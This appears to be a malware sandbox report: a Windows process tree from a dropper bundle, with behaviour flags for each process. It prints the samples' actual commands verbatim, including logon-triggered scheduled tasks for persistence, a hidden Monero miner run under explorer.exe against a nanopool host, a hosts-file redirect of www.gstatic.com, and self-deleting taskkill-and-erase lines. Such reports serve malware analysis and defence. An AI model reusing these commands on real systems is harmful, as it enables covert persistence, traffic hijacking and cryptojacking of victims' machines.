        "C:\Users\Admin\AppData\Local\Temp\bf-e495b-64b-f8db1-2705a8cbfa4ed\Sygaluvuzhe.exe"
        8⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:5648
        
        C:\Users\Admin\AppData\Local\Temp\58-bd7cd-fd1-4469d-20464a5ae2794\Tesirufalae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\58-bd7cd-fd1-4469d-20464a5ae2794\Tesirufalae.exe"
        8⤵
        Executes dropped EXE
        
        PID:5748
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jx4z3lqg.ou2\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\jx4z3lqg.ou2\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\jx4z3lqg.ou2\GcleanerEU.exe /eufive
        10⤵
        Executes dropped EXE
        
        PID:6652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 648
        11⤵
        Program crash
        
        PID:7104
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 684
        11⤵
        Program crash
        
        PID:6840
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 764
        11⤵
        Program crash
        
        PID:2788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 812
        11⤵
        Program crash
        
        PID:6500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6652 -s 880
        11⤵
        Program crash
        
        PID:6844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jx4z3lqg.ou2\GcleanerEU.exe" & exit
        11⤵
        
        PID:7164
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "GcleanerEU.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:6208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wzfommq.44m\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:4288
        
        C:\Users\Admin\AppData\Local\Temp\2wzfommq.44m\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\2wzfommq.44m\installer.exe /qn CAMPAIGN="654"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:6988
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2wzfommq.44m\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2wzfommq.44m\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630643757 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        11⤵
        
        PID:6472
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\435nl0ga.v3o\anyname.exe & exit
        9⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\435nl0ga.v3o\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\435nl0ga.v3o\anyname.exe
        10⤵
        Executes dropped EXE
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\435nl0ga.v3o\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\435nl0ga.v3o\anyname.exe" -u
        11⤵
        Executes dropped EXE
        
        PID:6448
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hqyevxtl.sip\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:6880
        
        C:\Users\Admin\AppData\Local\Temp\hqyevxtl.sip\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\hqyevxtl.sip\gcleaner.exe /mixfive
        10⤵
        Executes dropped EXE
        
        PID:6580
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hqyevxtl.sip\gcleaner.exe" & exit
        11⤵
        
        PID:2092
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "gcleaner.exe" /f
        12⤵
        Kills process with taskkill
        
        PID:6412
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tupda4ya.cht\autosubplayer.exe /S & exit
        9⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri155442fc38b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2060
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri155442fc38b.exe
        
        Fri155442fc38b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2664
      - C:\Users\Admin\AppData\Roaming\7181836.exe
        
        "C:\Users\Admin\AppData\Roaming\7181836.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4324 -s 1960
        7⤵
        Program crash
        
        PID:4940
      - C:\Users\Admin\AppData\Roaming\5847084.exe
        
        "C:\Users\Admin\AppData\Roaming\5847084.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4428
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4500
      - C:\Users\Admin\AppData\Roaming\6684504.exe
        
        "C:\Users\Admin\AppData\Roaming\6684504.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4528
      - C:\Users\Admin\AppData\Roaming\2314370.exe
        
        "C:\Users\Admin\AppData\Roaming\2314370.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4976
      - C:\Users\Admin\AppData\Roaming\8866255.exe
        
        "C:\Users\Admin\AppData\Roaming\8866255.exe"
        6⤵
        Executes dropped EXE
        
        PID:5064
      - C:\Users\Admin\AppData\Roaming\8560908.exe
        
        "C:\Users\Admin\AppData\Roaming\8560908.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1652
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:192
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        
        PID:4260
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:4256
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:5712
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5980
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:5736
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:5672
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:2144
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:5552
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4316
        
        C:\Users\Admin\AppData\Roaming\6677246.exe
        
        "C:\Users\Admin\AppData\Roaming\6677246.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        Suspicious use of WriteProcessMemory
        
        PID:4140
        
        C:\Users\Admin\AppData\Roaming\8037787.exe
        
        "C:\Users\Admin\AppData\Roaming\8037787.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
        
        C:\Users\Admin\AppData\Roaming\1242339.exe
        
        "C:\Users\Admin\AppData\Roaming\1242339.exe"
        8⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Roaming\6686198.exe
        
        "C:\Users\Admin\AppData\Roaming\6686198.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\6965756.exe
        
        "C:\Users\Admin\AppData\Roaming\6965756.exe"
        8⤵
        Executes dropped EXE
        
        PID:4520
        
        C:\Users\Admin\AppData\Roaming\7358051.exe
        
        "C:\Users\Admin\AppData\Roaming\7358051.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 800
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5148
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 836
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 852
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5840
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 896
        8⤵
        Program crash
        
        PID:4956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 992
        8⤵
        Program crash
        
        PID:5460
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 984
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4404
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4404 -s 1532
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\is-5D6A5.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5D6A5.tmp\setup_2.tmp" /SL5="$201FC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:4200
        
        C:\Users\Admin\AppData\Local\Temp\is-63QJU.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-63QJU.tmp\setup_2.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:4148
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4100
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:2848
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:596
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3152

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2684
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5588

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5176
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6048

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Executes dropped EXE
PID:4260
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:5292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6680

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6800

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:7056
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A597B14634D3EAD92022D88D0F04753D C
  2⤵
  - Loads dropped DLL
  PID:5412
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 70F93F57B991321191220A4E5D88DBF3
  2⤵
  - Loads dropped DLL
  PID:6896
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:4712
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 554EF08E6D0B3E4A4CD64B6696EE024B E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:3940

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6980
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Modifies registry class
  PID:6336

C:\Users\Admin\AppData\Local\Temp\8BA7.exe
C:\Users\Admin\AppData\Local\Temp\8BA7.exe
1⤵
- Executes dropped EXE
PID:6892

C:\Users\Admin\AppData\Local\Temp\29D.exe
C:\Users\Admin\AppData\Local\Temp\29D.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:424

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:5396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:2484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\2103.exe
C:\Users\Admin\AppData\Local\Temp\2103.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6368

C:\Users\Admin\AppData\Local\Temp\2FE9.exe
C:\Users\Admin\AppData\Local\Temp\2FE9.exe
1⤵
- Executes dropped EXE
PID:4916

C:\Users\Admin\AppData\Local\Temp\44D9.exe
C:\Users\Admin\AppData\Local\Temp\44D9.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6896
- C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
  "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe"
  2⤵
  - Executes dropped EXE
  PID:6308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
PID:5248
- C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
  "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  PID:4684
- - C:\Windows\SysWOW64\sc.exe
    sc stop FreeVPN
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "sc query "FreeVPN" | FIND /C "1060""
    3⤵
    PID:6040
  - - C:\Windows\SysWOW64\sc.exe
      sc query "FreeVPN"
      4⤵
      PID:5560
  - - C:\Windows\SysWOW64\find.exe
      FIND /C "1060"
      4⤵
      PID:4284
- - C:\Program Files (x86)\FreeVPN\search_awesome.exe
    "C:\Program Files (x86)\FreeVPN\search_awesome.exe" /S
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious use of SetWindowsHookEx
    PID:4176
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Search_Awesome
      4⤵
      PID:6936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "sc query "Search_Awesome" | FIND /C "1060""
      4⤵
      PID:6988
    - - C:\Windows\SysWOW64\sc.exe
        
        sc query "Search_Awesome"
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\find.exe
        
        FIND /C "1060"
        5⤵
        
        PID:5744
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" add 139.162.197.244 www.gstatic.com C:\Windows\system32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6952
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" -clean
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of SetWindowsHookEx
      PID:3636
  - - C:\Program Files (x86)\Search Awesome\setup.exe
      "C:\Program Files (x86)\Search Awesome\setup.exe" -in
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1048
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -in
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:4076
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -typ https://www.freevpn.win/download/thankyou.html?vcid=wp001g0hp4cqsk9aiin98pce&txid=1d86df2f0d7db69c91f537bff0172240d66300f4
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:4068
- - C:\Program Files (x86)\FreeVPN\FreeVPN.exe
    "C:\Program Files (x86)\FreeVPN\FreeVPN.exe"
    3⤵
    - Loads dropped DLL
    - Drops file in Program Files directory
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:2036
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat
      4⤵
      PID:3672
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:4080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4892

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3348

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4392

C:\Program Files (x86)\Search Awesome\setup.exe
"C:\Program Files (x86)\Search Awesome\setup.exe" -svc
1⤵
- Executes dropped EXE
PID:6192

C:\Program Files (x86)\FreeVPN\FreeVPN.exe
"C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -svc
1⤵
PID:3164

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:4808

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:4336

C:\Windows\system32\AUDIODG.EXE
